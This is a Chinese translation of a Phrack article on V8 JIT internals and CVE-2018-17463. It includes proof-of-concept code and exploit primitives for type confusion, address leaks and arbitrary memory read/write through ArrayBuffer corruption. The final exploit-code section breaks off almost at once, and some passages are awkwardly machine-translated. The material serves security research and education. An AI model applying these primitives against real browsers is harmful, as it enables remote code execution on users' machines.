V8-JIT引擎中逻辑类漏洞的利用(CVE-2018-17463

2019-08-24 本文已影响0人 Nevv

Exploiting Logic Bugs in JavaScript JIT Engines

翻译自: http://www.phrack.org/papers/jit_exploitation.html

0 - Introduction
1 - V8 Overview
    1.1 - Values
    1.2 - Maps
    1.3 - Object Summary
2 - An Introduction to Just-in-Time Compilation for JavaScript
    2.1 - Speculative Just-in-Time Compilation
    2.2 - Speculation Guards
    2.3 - Turbofan
    2.4 - Compiler Pipeline
    2.5 - A JIT Compilation Example
3 - JIT Compiler Vulnerabilities
    3.1 - Redundancy Elimination
    3.2 - CVE-2018-17463
4 - Exploitation
    4.1 - Constructing Type Confusions
    4.2 - Gaining Memory Read/Write
    4.3 - Reflections
    4.4 - Gaining Code Execution
5 - References
6 - Exploit Code

0. - 介绍

本文以CVE-2018-17463漏洞为例，介绍了JIT编译器漏洞的相关知识，这个漏洞是在对源码进行review的时候发现的，之后被google官方修复。漏洞利用脚本在chrome version 69.0.3497.81 (64-bit), corresponding to v8 version 6.9.427.19 可以复现。

1. - V8 概述

V8是谷歌的开源JavaScript引擎，用于支持其他基于chrome的web浏览器。它是用c++编写的。V8提供了大量的文档，包括源代码和在线[3]。此外，v8有多个特性，有助于探索其内部工作原理

通过d8 (v8的JavaScript shell)的——enable-native -syntax标志启用了许多可从JavaScript使用的内置函数。例如，允许用户通过%DebugPrint检查对象，使用%CollectGarbage触发垃圾收集，或者通过%OptimizeFunctionOnNextCall强制JIT编译函数
各种跟踪模式，也通过命令行标志启用，这导致将许多引擎内部事件的日志记录到stdout或日志文件中。有了这些，就可以在JIT编译器中跟踪不同优化传递的行为
tools/子目录中的其他工具，比如JIT IR的可视化工具turbolizer。

由于JavaScript是一种动态类型语言，引擎必须用每个运行时值存储类型信息。在v8中，这是通过指针标记和使用专用类型信息对象(称为map)的组合来实现的。v8中不同的JavaScript值类型列在src/objects.h中，其中摘录如下。


    // Inheritance hierarchy:
    // - Object
    //   - Smi          (immediate small integer)
    //   - HeapObject   (superclass for everything allocated in the heap)
    //     - JSReceiver  (suitable for property access)
    //       - JSObject
    //     - Name
    //       - String
    //     - HeapNumber
    //     - Map
    //     ...

然后将JavaScript值表示为静态类型Object*的tag指针。在64位架构上，使用以下tag方案:

    Smi:        [32 bit signed int] [31 bits unused] 0
    HeapObject: [64 bit direct pointer]            | 01

因此，指针标记区别于Smi和HeapObjects。然后，所有进一步的类型信息都存储在Map实例中，每个HeapObject的偏移量为0时都可以找到指向该实例的指针.使用这种指针标记方案，Smi上的算术或二进制操作通常可以忽略标记，因为较低的32位都是零。然而，取消对HeapObject的引用需要首先屏蔽掉最不重要的位(LSB)。因此，对HeapObject数据成员的所有访问都必须经过特殊的访问器，该访问器负责清除LSB。事实上，v8中的对象没有任何c++数据成员，因为指针标记不可能访问这些数据成员。相反，引擎通过提到的访问器函数将数据成员存储在对象中预定义的偏移量中。实际上，v8定义了对象本身的内存布局，而不是将其委托给编译器。

1.2 - Maps

Map是v8中的一个关键数据结构，包含这样的信息

对象的动态类型，即String, Uint8Array, HeapNumber，…
对象的大小(以字节为单位)
对象的属性及其存储位置
数组元素的类型，例如unboxed的双精度指针或带标记的指针
对象的原型

虽然属性名通常存储在map中，但是属性值与对象本身一起存储在几个可能的区域之一。然后，map提供了属性值在各自区域中的确切位置。通常，可以在三个不同的区域中存储属性值:对象本身内部(“内联属性”)、单独的动态大小堆缓冲区(“行外属性”)，或者，如果属性名是整数索引[4]，则作为动态大小堆数组中的数组元素存储。在前两种情况下，map将存储属性值的槽号，而在最后一种情况下，slot是元素索引。这可以从下面的例子中看出:

    let o1 = {a: 42, b: 43};
    let o2 = {a: 1337, b: 1338};

执行后：

                                +----------------+
                      |                |
                      | map1           |
                      |                |
                      | property: slot |
                      |      .a : 0    |
                      |      .b : 1    |
                      |                |
                      +----------------+
                          ^         ^
    +--------------+      |         |
    |              +------+         |
    |    o1        |           +--------------+
    |              |           |              |
    | slot : value |           |    o2        |
    |    0 : 42    |           |              |
    |    1 : 43    |           | slot : value |
    +--------------+           |    0 : 1337  |
                               |    1 : 1338  |
                               +--------------+

由于map在内存使用方面是相对昂贵的对象，所以它们在“相似”对象之间尽可能多地共享。这可以在前面的示例中看到，其中o1和o2共享相同的Map map1。但是，如果在o1中添加了第三个属性.c(例如值为1339)，那么就不能再共享映射，因为o1和o2现在拥有不同的属性。因此，为o1创建了一个新的映射:

       +----------------+       +----------------+
       |                |       |                |
       | map1           |       | map2           |
       |                |       |                |
       | property: slot |       | property: slot |
       | .a      : 0    |       | .a      : 0    |
       | .b      : 1    |       | .b      : 1    |
       |                |       | .c      : 2    |
       +----------------+       +----------------+
               ^                        ^
               |                        |
               |                        |
        +--------------+         +--------------+
        |              |         |              |
        |    o2        |         |    o1        |
        |              |         |              |
        | slot : value |         | slot : value |
        |    0 : 1337  |         |    0 : 1337  |
        |    1 : 1338  |         |    1 : 1338  |
        +--------------+         |    2 : 1339  |
                                 +--------------+

如果稍后将相同的属性.c也添加到o2中，那么这两个对象将再次共享map2。有效工作的方法是，在每个映射中跟踪，如果向对象添加了某个名称(可能还有类型)的属性，那么应该将对象转换为哪个新映射。这种数据结构通常称为转换表。

但是V8也能够将属性存储为散列映射，而不是使用映射和插槽机制，在这种情况下，属性名直接映射到值。当引擎认为Map机制会导致额外的开销时，例如在单例对象的情况下，就会使用这种方法.

Map机制对于垃圾收集也是必不可少的:当收集器处理分配(HeapObject)时，它可以立即检索信息，比如对象的大小，以及对象是否包含需要通过检查映射扫描的任何其他标记指针。

1.3 - Object Summary

考虑下面的代码片段：

  let obj = {
      x: 0x41,
      y: 0x42
    };
    obj.z = 0x43;
    obj[0] = 0x1337;
    obj[1] = 0x1338;

在v8中执行后，检查对象的内存地址如下:

    (lldb) x/5gx 0x23ad7c58e0e8
    0x23ad7c58e0e8: 0x000023adbcd8c751 0x000023ad7c58e201
    0x23ad7c58e0f8: 0x000023ad7c58e229 0x0000004100000000
    0x23ad7c58e108: 0x0000004200000000

    (lldb) x/3gx 0x23ad7c58e200
    0x23ad7c58e200: 0x000023adafb038f9 0x0000000300000000
    0x23ad7c58e210: 0x0000004300000000

    (lldb) x/6gx 0x23ad7c58e228
    0x23ad7c58e228: 0x000023adafb028b9 0x0000001100000000
    0x23ad7c58e238: 0x0000133700000000 0x0000133800000000
    0x23ad7c58e248: 0x000023adafb02691 0x000023adafb02691
    ...

首先是对象本身由一个指向它的map(0 x23adbcd8c751),其out-of-line指针属性(0x23ad7c58e201),指针指向的元素(0x23ad7c58e229),和两个内联属性(x, y)

out-of-line指针显示另一个对象以map开始(这表明这是一个FixedArray)其次是大小和属性z。elements数组同样以指向映射的指针开始，然后是容量，然后是两个元素，索引0、1和9进一步设置为神奇值“the_hole”(指示后备内存已被过度提交)。可以看到，所有值都存储为带标记的指针。如果以同样的方式创建更多的对象，它们将重用现有的映射。

2 - Just-in-Time编译介绍

现代JavaScript引擎通常使用一个解释器和一个或多个即时编译器。随着代码单元执行得越来越频繁，它被移动到能够更快地执行代码的更高层次，尽管它们的启动时间通常也更高。下一节的目的是直观地介绍而不是正式地解释动态语言(如JavaScript)的JIT编译器如何从脚本生成优化的机器码。

2.1 - Speculative Just-in-Time Compilation

考虑以下两个代码片段。它们是如何被编译成机器码的?


    // C++
    int add(int a, int b) {
        return a + b;
    }

    // JavaScript
    function add(a, b) {
        return a + b;
    }

对于第一个代码片段，答案似乎相当清楚。毕竟，参数的类型以及ABI(它指定用于参数和返回值的寄存器)都是已知的。此外，目标机器的指令集是可用的。因此，编译到机器码可能会生成以下x86_64代码

   lea eax, [rdi + rsi]
    ret

然而，对于JavaScript代码，类型信息是未知的。因此，似乎不可能产生比一般的add操作处理程序[5]更好的东西，它只能在解释器上提供微不足道的性能提升。事实证明，处理缺失的类型信息是将动态语言编译为机器码的一个关键挑战。这也可以通过想象一个使用静态类型的JavaScript方言来实现，例如:

    function add(a: Smi, b: Smi) -> Smi {
        return a + b;
    }

In this case, it is again rather easy to produce machine code:

    lea     rax, [rdi+rsi]
    jo      bailout_integer_overflow
    ret

这是可能的，因为由于指针标记方案，Smi的下32位都是0。这个汇编代码看起来与c++示例非常相似，除了额外的溢出检查，这是必需的，因为JavaScript不知道整数溢出(在规范中所有数字都是IEEE 754双精度浮点数)，但是cpu当然知道。因此，在不太可能出现整数溢出的情况下，引擎将不得不将执行转移到不同的、更通用的执行层，比如解释器。在这里，它将重复失败的操作，在本例中，在将两个输入相加之前，将它们转换为浮点数。这种机制通常称为紧急援助，对于JIT编译器非常重要，因为它允许编译器生成专门的代码，如果发生意外情况，这些代码总是可以返回到更通用的代码

不幸的是，对于纯JavaScript, JIT编译器没有静态类型信息的舒适感。但是，由于JIT编译只发生在较低级别的几次执行之后，比如解释器，JIT编译器可以使用以前执行的类型信息。这反过来又支持推测性优化:编译器将假设将来以类似的方式使用代码单元，从而看到相同的类型，例如参数。然后，它可以生成如上所示的优化代码，假设将来会使用这些类型。

2.2 - Speculation Guards

当然，不能保证代码单元总是以类似的方式使用。因此，在执行优化代码之前，编译器必须验证其所有类型猜测在运行时仍然有效。这是通过一些轻量级运行时检查来实现的，下面将讨论这些检查

通过检查来自以前执行的反馈和当前引擎状态，JIT编译器首先提出各种假设，比如“这个值将始终是一个Smi”，或者“这个值将始终是一个具有特定映射的对象”，甚至“这个Smi添加永远不会导致整数溢出”。然后用一小段机器代码(称为Guards)验证这些猜测在运行时是否仍然成立。如果Guards失败，它将对较低的执行层(如解释器)执行紧急救援。下面是两个常用的投机防范:

    ; Ensure is Smi
    test    rdi, 0x1
    jnz     bailout

    ; Ensure has expected Map
    cmp    QWORD PTR [rdi-0x1], 0x12345601
    jne    bailout

第一个警卫(Smi警卫)通过检查指针标记是否为零来验证某个值是否为Smi。

第二个守卫，一个Map守卫，验证HeapObject实际上拥有它期望拥有的映射。

使用猜测保护，处理丢失的类型信息的步骤将变为:

在解释器中执行期间收集类型概要文件
推测相同的类型将在未来使用
使用运行时预测guards来保护这些预测
最后生成优化代码

从本质上讲，插入一个预测guards会向它后面的代码添加一段静态类型信息。

2.3 - Turbofan

尽管用户JavaScript代码的内部表示形式已经以字节码的形式提供给解释器，JIT编译器通常将字节码转换为定制的中间表示形式(IR)，它更适合执行各种优化。v8中的JIT编译器Turbofan也不例外。Turbofan使用的IR是基于图的，由操作(节点)和节点之间不同类型的边组成，即

control-flow edges, connecting control-flow operations such as loops and if conditions
data-flow edges, connecting input and output values
effect-flow edges, 将有效的操作连接起来，以便正确地安排它们。例如:考虑存储到属性，然后加载相同的属性。由于这两个操作之间不存在数据流或控制流依赖关系，因此需要effect-flow在加载之前正确地调度存储。

此外，turbofan IR支持三种不同类型的操作:JavaScript操作、简化操作和机器操作。机器操作通常类似于单个机器指令，而JS操作类似于通用字节码指令。简化操作介于两者之间。因此，机器操作可以直接转换成机器指令，而其他两种类型的操作需要进一步转换为更低级的操作(称为降低)。例如，可以将泛型属性加载操作降低到CheckHeapObject和checkmap操作，然后从对象的内联slot加载8字节。

研究JIT编译器在各种场景中的行为的一种方便的方法是通过v8的turbolizer工具[6]:一个小的web应用程序，它使用由——trace-turbo命令行标志生成的输出，并将其呈现为一个交互式图形。

2.4 - Compiler Pipeline

根据前面描述的机制，典型的JavaScript JIT compiler大致如下:

图的构建和特殊化:使用来自解释器的字节码和运行时类型概要文件，并构建表示相同计算的IR图。检查类型概要文件，并在此基础上制定预测，例如要查看操作的哪些类型的值，预测有guards守护。
优化:由于有了这些保护，结果图现在具有静态类型信息，其优化非常类似于“经典”提前编译器所做的优化。在这里，优化被定义为一种代码转换，这种转换对于正确性不是必需的，但是可以提高代码的执行速度或内存占用。典型的优化包括循环不变的代码移动、常量折叠、转义分析和内联。
降低:最后，将生成的图降低为机器码，然后将机器码写入可执行内存区域。从那时起，调用编译后的函数将导致执行转移到生成的代码。

不过，这种结构相当灵活。例如，降低可以在多个阶段发生，在它们之间还可以进行进一步的优化。此外，寄存器分配必须在某一时刻执行，但这在某种程度上也是一种优化。

2.5 - A JIT Compilation Example

This chapter is concluded with an example of the following function being JIT compiled by turbofan:

function foo(o) {
        return o.b;
    }

During parsing, the function would first be compiled to generic bytecode, which can be inspected using the --print-bytecode flag for d8. The output is shown below.

    Parameter count 2
    Frame size 0
       12 E> 0 : a0                StackCheck
       31 S> 1 : 28 02 00 00       LdaNamedProperty a0, [0], [0]
       33 S> 5 : a4                Return
    Constant pool (size = 1)
    0x1fbc69c24ad9: [FixedArray] in OldSpace
     - map: 0x1fbc6ec023c1 <Map>
     - length: 1
               0: 0x1fbc69c24301 <String[1]: b>

The function is mainly compiled to two operations: LdaNamedProperty, which loads property .b of the provided argument, and Return, which returns said property. The StackCheck operation at the beginning of the function guards against stack overflows by throwing an exception if the call stack size is exceeded. More information about v8's bytecode format and interpreter can be found online [7].

To trigger JIT compilation, the function has to be invoked several times:

    for (let i = 0; i < 100000; i++) {
        foo({a: 42, b: 43});
    }

    /* Or by using a native after providing some type information: */
    foo({a: 42, b: 43});
    foo({a: 42, b: 43});
    %OptimizeFunctionOnNextCall(foo);
    foo({a: 42, b: 43});

This will also inhabit the feedback vector of the function which associates observed input types with bytecode operations. In this case, the feedback vector entry for the LdaNamedProperty would contain a single entry: the Map of the objects that were given to the function as argument. This Map will indicate that property .b is stored in the second inline slot.

Once turbofan starts compiling, it will build a graph representation of the JavaScript code. It will also inspect the feedback vector and, based on that, speculate that the function will always be called with an object of a
specific Map. Next, it guards these assumptions with two runtime checks, which will bail out to the interpreter if the assumptions ever turn out to be false, then proceeds to emit a property load for an inline property. The optimized graph will ultimately look similar to the one shown below. Here, only data-flow edges are shown.


        +----------------+
        |                |
        |  Parameter[1]  |
        |                |
        +-------+--------+
                |                   +-------------------+
                |                   |                   |
                +------------------->  CheckHeapObject  |
                                    |                   |
                                    +----------+--------+
          +------------+                       |
          |            |                       |
          |  CheckMap  <-----------------------+
          |            |
          +-----+------+
                |                   +------------------+
                |                   |                  |
                +------------------->  LoadField[+32]  |
                                    |                  |
                                    +----------+-------+
           +----------+                        |
           |          |                        |
           |  Return  <------------------------+
           |          |
           +----------+

This graph will then be lowered to machine code similar to the following.

    ; Ensure o is not a Smi
    test    rdi, 0x1
    jz      bailout_not_object

    ; Ensure o has the expected Map
    cmp     QWORD PTR [rdi-0x1], 0xabcd1234
    jne     bailout_wrong_map

    ; Perform operation for object with known Map
    mov     rax, [rdi+0x1f]
    ret

If the function were to be called with an object with a different Map, the second guard would fail, causing a bailout to the interpreter (more precisely to the LdaNamedProperty operation of the bytecode) and likely the discarding of the compiled code. Eventually, the function would be recompiled to take the new type feedback into account. In that case, the function would be re-compiled to perform a polymorphic property load (supporting more than one input type), e.g. by emitting code for the property load for both Maps, then jumping to the respective one depending on the current Map. If the operation becomes even more polymorphic, the compiler might decide to use a generic inline cache (IC) [8][9] for the polymorphic operation. An IC caches previous lookups but can always fall-back to the runtime function for previously unseen input types without bailing out of the JIT code.

3 - JIT Compiler 漏洞

JavaScript JIT编译器通常在c++中实现，因此受到内存和类型安全违规的常见列表的约束。这些并不是特定于JIT编译器的，因此不会进一步讨论。相反，重点将放在编译器中的bug上，这些bug会导致不正确的机器码生成，然后可以利用这些错误导致内存损坏。

除了[10][11]降低阶段的bug(这些bug通常会导致生成的机器码中出现整数溢出等经典漏洞)之外，许多有趣的bug来自各种优化。在边界检查消除[12][13][14][15]、转义分析[16][17]、寄存器分配[18]等方面存在bug。

每一次优化都会产生自己的漏洞。在审计复杂的软件(如JIT编译器)时，提前确定特定的漏洞模式并查找它们的实例通常是一种明智的方法。这也是手工代码审计的一个好处:知道特定类型的错误通常会导致简单、可靠的利用这是审计人员可以专门寻找的。

因此，接下来将讨论一个具体的优化，即 Redundancy Elimination，以及可以找到的漏洞类型和一个具体的漏洞，CVE-2018-17463

3.1 - Redundancy Elimination

One popular class of optimizations aims to remove safety checks from the emitted machine code if they are determined to be unnecessary. As can be imagined, these are very interesting for the auditor as a bug in those will usually result in some kind of type confusion or out-of-bounds access.

One instance of these optimization passes, often called "redundancy elimination", aims to remove redundant type checks. As an example, consider the following code:

        function foo(o) {
        return o.a + o.b;
    }

Following the JIT compilation approach outlined in chapter 2, the following IR code might be emitted for it:


    CheckHeapObject o
    CheckMap o, map1
    r0 = Load [o + 0x18]

    CheckHeapObject o
    CheckMap o, map1
    r1 = Load [o + 0x20]

    r2 = Add r0, r1
    CheckNoOverflow
    Return r2

这里的明显问题是冗余的第二对CheckHeapObject和CheckMap操作。在这种情况下，很明显o的映射不能在两个CheckMap操作之间更改。因此，冗余消除的目标是检测这些类型的冗余检查，并除去同一控制流路径上除第一个外的所有冗余检查。

然而，某些操作可能会产生副作用:对执行上下文的可见更改。例如，调用用户提供的函数的调用操作可以很容易地更改对象的映射，例如通过添加或删除属性。在这种情况下，实际上需要一个看似冗余的检查，因为映射可能在两个检查之间发生更改。

因此，编译器必须知道其IR中的所有有效操作，这对于优化非常重要。不出所料，由于JavaScript语言的特性，正确预测JIT操作的副作用非常困难。因此，与不正确的副作用预测相关的bug会不时出现，通常是通过欺骗编译器删除看似冗余的类型检查，然后调用编译后的代码，从而在不进行前面的类型检查的情况下使用意外类型的对象。然后出现某种形式的类型混淆。

与错误的副作用建模相关的漏洞通常可以通过定位IR操作来发现，这些操作被引擎假定没有副作用，然后验证它们在所有情况下是否真的没有副作用。CVE-2018-17463就是这样被发现的。

3.2 - CVE-2018-17463

In v8, IR operations have various flags associated with them. One of them, kNoWrite, indicates that the engine assumes that an operation will not have observable side-effects, it does not "write" to the effect chain. An example for such an operation was JSCreateObject, shown below:


    #define CACHED_OP_LIST(V)                                            \
      ...                                                                \
      V(CreateObject, Operator::kNoWrite, 1, 1)                          \
      ...

To determine whether an IR operation might have side-effects it is often necessary to look at the lowering phases which convert high-level operations, such as JSCreateObject, into lower-level instruction and eventually machine instructions. For JSCreateObject, the lowering happens in js-generic-lowering.cc, responsible for lowering JS operations:

void JSGenericLowering::LowerJSCreateObject(Node* node) {
  CallDescriptor::Flags flags = FrameStateFlagForCall(node);
  Callable callable = Builtins::CallableFor(
      isolate(), Builtins::kCreateObjectWithoutProperties);
  ReplaceWithStubCall(node, callable, flags);
}

简单地说，这意味着JSCreateObject操作将被降低为对运行时函数CreateObjectWithoutProperties的调用。这个函数最终调用ObjectCreate，这是另一个内置函数，但这次是用c++实现的。最终，控制流在JSObject::OptimizeAsPrototype中结束。这很有趣，因为它似乎暗示原型对象可能在上述优化过程中被修改，这对JIT编译器可能是一个意外的副作用。可以运行以下代码片段来检查OptimizeAsPrototype是否以某种方式修改对象:


    let o = {a: 42};
    %DebugPrint(o);
    Object.create(o);
    %DebugPrint(o);

Indeed, running it with `d8 --allow-natives-syntax` shows:

    DebugPrint: 0x3447ab8f909: [JS_OBJECT_TYPE]
    - map: 0x0344c6f02571 <Map(HOLEY_ELEMENTS)> [FastProperties]
    ...

    DebugPrint: 0x3447ab8f909: [JS_OBJECT_TYPE]
    - map: 0x0344c6f0d6d1 <Map(HOLEY_ELEMENTS)> [DictionaryProperties]

可以看到，对象的映射在成为原型时发生了变化，所以对象也一定以某种方式发生了变化。特别是，当成为原型时，对象的out- line属性存储被转换为dictionary模式。因此，位于对象偏移量8处的指针将不再指向PropertyArray(all properties one after each other, after a short header)，而是指向NameDictionary(更复杂的数据结构，直接将属性名映射到值，而不依赖于映射)。这当然是一个副作用，在这种情况下，这对于JIT编译器来说是一个意想不到的副作用。Map更改的原因是在v8中，由于引擎[19]的其他部分使用了优化技巧，所以原型映射从来没有共享过。

At this point it is time to construct a first proof-of-concept for the bug. The requirements to trigger an observable misbehavior in a compiled function are:

    0. The function must receive an object that is not currently used as a
    prototype.

    1. The function needs to perform a CheckMap operation so that
    subsequent ones can be eliminated.

    2. The function needs to call Object.create with the object as argument
    to trigger the Map transition.

    3. The function needs to access an out-of-line property. This will,
    after a CheckMap that will later be incorrectly eliminated, load the
    pointer to the property storage, then deference that believing that it
    is pointing to a PropertyArray even though it will point to a
    NameDictionary.

The following JavaScript code snippet accomplishes this：

    function hax(o) {
        // Force a CheckMaps node.
        o.a;

        // Cause unexpected side-effects.
        Object.create(o);

        // Trigger type-confusion because CheckMaps node is removed.
        return o.b;
    }

    for (let i = 0; i < 100000; i++) {
        let o = {a: 42};
        o.b = 43;           // will be stored out-of-line.
        hax(o);
    }

It will first be compiled to pseudo IR code similar to the following:


    CheckHeapObject o
    CheckMap o, map1
    Load [o + 0x18]

    // Changes the Map of o
    Call CreateObjectWithoutProperties, o

    CheckMap o, map1
    r1 = Load [o + 0x8]         // Load pointer to out-of-line properties
    r2 = Load [r1 + 0x10]       // Load property value

    Return r2

Afterwards, the redundancy elimination pass will incorrectly remove the second Map check, yielding:

   CheckHeapObject o
    CheckMap o, map1
    Load [o + 0x18]

    // Changes the Map of o
    Call CreateObjectWithoutProperties, o

    r1 = Load [o + 0x8]
    r2 = Load [r1 + 0x10]

    Return r2

When this JIT code is run for the first time, it will return a different value than 43, namely an internal fields of the NameDictionary which happens to be located at the same offset as the .b property in the PropertyArray. Note that in this case, the JIT compiler tried to infer the type of the argument object at the second property load instead of relying on the type feedback and thus, assuming the map wouldn’t change after the first type check, produced a property load from a FixedArray instead of a NameDictionary.

4 - Exploitation 利用

The bug at hand allows the confusion of a PropertyArray with a NameDictionary. Interestingly, the NameDictionary still stores the property values inside a dynamically sized inline buffer of (name, value, flags) triples. As such, there likely exists a pair of properties P1 and P2 such that both P1 and P2 are located at offset O from the start of either the PropertyArray or the NameDictionary respectively. This is interesting forreasons explained in the next section. Shown next is the memory dump of the PropertyArray and NameDictionary for the same properties side by side:


    let o = {inline: 42};
    o.p0 = 0; o.p1 = 1; o.p2 = 2; o.p3 = 3; o.p4 = 4;
    o.p5 = 5; o.p6 = 6; o.p7 = 7; o.p8 = 8; o.p9 = 9;

    0x0000130c92483e89         0x0000130c92483bb1
    0x0000000c00000000         0x0000006500000000
    0x0000000000000000         0x0000000b00000000
    0x0000000100000000         0x0000000000000000
    0x0000000200000000         0x0000002000000000
    0x0000000300000000         0x0000000c00000000
    0x0000000400000000         0x0000000000000000
    0x0000000500000000         0x0000130ce98a4341
    0x0000000600000000  <-!->  0x0000000200000000
    0x0000000700000000         0x000004c000000000
    0x0000000800000000         0x0000130c924826f1
    0x0000000900000000         0x0000130c924826f1
    ...                        ...

In this case the properties p6 and p2 overlap after the conversion to dictionary mode. Unfortunately, the layout of the NameDictionary will be different in every execution of the engine due to some process-wide
randomness being used in the hashing mechanism. It is thus necessary to first find such a matching pair of properties at runtime. The following code can be used for that purpose.


    function find_matching_pair(o) {
        let a = o.inline;
        this.Object.create(o);
        let p0 = o.p0;
        let p1 = o.p1;
        ...;
        return [p0, p1, ..., pN];
        let pN = o.pN;
    }

然后，搜索返回的数组以寻找匹配项。如果这个漏洞很不幸，并且没有找到匹配的对(因为所有的属性都存储在NameDictionaries内联缓冲区的末尾，这是因为运气不好)，它能够检测到这一点，并且可以简单地使用不同数量的属性或不同的属性名称重试。

4.1 - Constructing Type Confusions

There is an important bit about v8 that wasn't discussed yet. Besides the location of property values, Maps also store type information for properties. Consider the following piece of code:

    let o = {}
    o.a = 1337;
    o.b = {x: 42};

After executing it in v8, the Map of o will indicate that the property .a will always be a Smi while property .b will be an Object with a certain Map that will in turn have a property .x of type Smi. In that case, compiling a
function such as

    function foo(o) {
        return o.b.x;
    }

将导致对o进行一次映射检查，但不会对.b属性进行进一步的映射检查，因为已知.b始终是具有特定映射的对象。如果通过分配不同类型的属性值使属性的类型信息失效，则分配一个新的映射，并将该属性的类型信息扩展为包含以前的和新的类型。这样，就有可能从现有的错误中构造一个强大的exploit原语:通过找到匹配的属性对，JIT代码可以被编译，它假设将加载一种类型的属性p1，但实际上却加载了另一种类型的属性p2。由于类型信息存储在映射中,编译器将,然而,省略属性值的类型检查,从而产生一种通用类型的困惑:一个原始的,允许一个混淆一个X和一个Y类型的对象类型的对象,X和Y,以及将执行的操作类型X在JIT代码中,可以任意选择。毫无疑问，这是一个非常强大的原语。下面是exp代码，用于从手边的bug中创建这样一个类型混淆原语。这里p1和p2是将属性存储转换为dictionary模式后重叠的两个属性的属性名。由于事先不知道它们，因此该攻击依赖于eval在运行时生成正确的代码。

    eval(`
        function vuln(o) {
            // Force a CheckMaps node
            let a = o.inline;
            // Trigger unexpected transition of property storage
            this.Object.create(o);
            // Seemingly load .p1 but really load .p2
            let p = o.${p1};
            // Use p (known to be of type X but really is of type Y)
            // ...;
        }
    `);

    let arg = makeObj();
    arg[p1] = objX;
    arg[p2] = objY;
    vuln(arg);

In the JIT compiled function, the compiler will then know that the local variable p will be of type X due to the Map of o and will thus omit type checks for it. However, due to the vulnerability, the runtime code will actually receive an object of type Y, causing a type confusion.

4.2 - Gaining Memory Read/Write

From here, additional exploit primitives will now be constructed: first a primitive to leak the addresses of JavaScript objects, second a primitive to overwrite arbitrary fields in an object. The address leak is possible by confusing the two objects in a compiled piece of code which fetches the .x property, an unboxed double, converts it to a v8 HeapNumber, and returns that to the caller. Due to the vulnerability, it will, however, actually load a pointer to an object and return that as a double.

  function vuln(o) {
        let a = o.inline;
        this.Object.create(o);
        return o.${p1}.x1;
    }

    let arg = makeObj();
    arg[p1] = {x: 13.37};       // X, inline property is an unboxed double
    arg[p2] = {y: obj};         // Y, inline property is a pointer
    vuln(arg);

This code will result in the address of obj being returned to the caller as a double, such as 1.9381218278403e-310. Next, the corruption. As is often the case, the "write" primitive is just the inversion of the "read" primitive. In this case, it suffices to write to a property that is expected to be an unboxed double, such as shown next.


    function vuln(o) {
        let a = o.inline;
        this.Object.create(o);
        let orig = o.${p1}.x2;
        o.${p1}.x = ${newValue};
        return orig;
    }

This will "corrupt" property .y of the second object with a controlled double. However, to achieve something useful, the exploit would likely need to corrupt an internal field of an object, such as is done below for an ArrayBuffer. Note that the second primitive will read the old value of the property and return that to the caller. This makes it possible to:

* immediately detect once the vulnerable code ran for the first time
      and corrupted the victim object

* fully restore the corrupted object at a later point to guarantee
      clean process continuation.

With those primitives at hand, gaining arbitrary memory read/write becomes as easy as

    0. Creating two ArrayBuffers, ab1 and ab2

    1. Leaking the address of ab2

    2. Corrupting the backingStore pointer of ab1 to point to ab2
    
    
    
     +-----------------+           +-----------------+
    |  ArrayBuffer 1  |     +---->|  ArrayBuffer 2  |
    |                 |     |     |                 |
    |  map            |     |     |  map            |
    |  properties     |     |     |  properties     |
    |  elements       |     |     |  elements       |
    |  byteLength     |     |     |  byteLength     |
    |  backingStore --+-----+     |  backingStore   |
    |  flags          |           |  flags          |
    +-----------------+           +-----------------+

Afterwards, arbitrary addresses can be accessed by overwriting the ackingStore pointer of ab2 by writing into ab1 and subsequently reading from or writing to ab2.

4.3 - Reflections

As was demonstrated, by abusing the type inference system in v8, an initially limited type confusion primitive can be extended to achieve confusion of arbitrary objects in JIT code. This primitive is powerful for several reasons:

0. 用户能够创建自定义类型，例如，通过向对象添加属性。这避免了寻找好的类型混淆候选项的需要，因为您可以直接创建它，就像前面介绍的漏洞所做的那样，它将ArrayBuffer与具有内联属性的对象混淆，从而破坏backingStore指针。
1. 可以对类型为X的对象执行任意操作，但在运行时由于该漏洞接收类型为Y的对象的代码可以被JIT编译。提出了利用编译对unboxed double属性的加载和存储来分别达到arraybuffer的leaks和corruption目的。
2. 类型信息被引擎积极跟踪的事实，增加了可能彼此混淆的类型的数量。

因此，如果低级原语不足以实现可靠的内存读/写，那么最好先从低级原语构造所讨论的原语。很可能，大多数类型检查消除错误都可以转换成这个原语。此外，其他类型的漏洞也可能被利用来产生它。可能的例子包括寄存器分配错误、释放后的使用，或者对JavaScript对象的属性缓冲区进行越界读写。

4.4 Gaining Code Execution

While previously an attacker could simply write shellcode into the JIT region and execute it, things have become slightly more time consuming: in early 2018, v8 introduced a feature called write-protect-code-memory [20] which essentially flips the JIT region's access permissions between R-X and RW-. With that, the
JIT region will be mapped as R-X during execution of JavaScript code, thus preventing an attacker from directly writing into it. As such, one now needs to find another way to code execution, such as simply performing ROP by overwriting vtables, JIT function pointers, the stack, or through another method of one's choosing. This is left as an exercise for the reader. Afterwards, the only thing left to do is to run a sandbox escape... ;)

5 - References


[1] https://blogs.securiteam.com/index.php/archives/3783
[2] https://cs.chromium.org/
[3] https://v8.dev/
[4] https://www.ecma-international.org/ecma-262/8.0/
index.html#sec-array-exotic-objects
[5] https://www.ecma-international.org/ecma-262/8.0/
index.html#sec-addition-operator-plus
[6] https://chromium.googlesource.com/v8/v8.git/+/6.9.427.19/
tools/turbolizer/
[7] https://v8.dev/docs/ignition
[8] https://www.mgaudet.ca/technical/2018/6/5/
an-inline-cache-isnt-just-a-cache
[9] https://mathiasbynens.be/notes/shapes-ics
[10] https://bugs.chromium.org/p/project-zero/issues/detail?id=1380
[11] https://github.com/WebKit/webkit/commit/
61dbb71d92f6a9e5a72c5f784eb5ed11495b3ff7
[12] https://bugzilla.mozilla.org/show_bug.cgi?id=1145255
[13] https://www.thezdi.com/blog/2017/8/24/
deconstructing-a-winning-webkit-pwn2own-entry
[14] https://bugs.chromium.org/p/chromium/issues/detail?id=762874
[15] https://bugs.chromium.org/p/project-zero/issues/detail?id=1390
[17] https://bugs.chromium.org/p/project-zero/issues/detail?id=1396
[16] https://cloudblogs.microsoft.com/microsoftsecure/2017/10/18/
browser-security-beyond-sandboxing/
[18] https://www.mozilla.org/en-US/security/advisories/
mfsa2018-24/#CVE-2018-12386
[19] https://mathiasbynens.be/notes/prototypes
[20] https://github.com/v8/v8/commit/
14917b6531596d33590edb109ec14f6ca9b95536

6 - Exploit Code



if (typeof(window) !== 'undefined') {
    print = function(msg) {
        console.log(msg);
        document.body.textContent += msg + "\r\n";
    }
}

{
    // Conversion buffers.
